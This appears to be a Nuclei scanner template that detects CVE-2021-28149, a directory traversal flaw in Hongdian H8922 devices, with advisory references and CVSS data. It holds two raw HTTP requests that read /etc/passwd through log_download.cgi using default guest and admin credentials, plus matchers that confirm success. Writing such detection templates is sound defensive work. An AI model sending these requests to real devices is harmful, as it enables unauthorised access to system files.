id: CVE-2021-28149 info: name: Hongdian Directory Traversal author: gy741 severity: medium description: | Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 tags: cve,cve2021,hongdian,traversal requests: - raw: - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/octet-stream" part: header - type: regex regex: - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]" part: body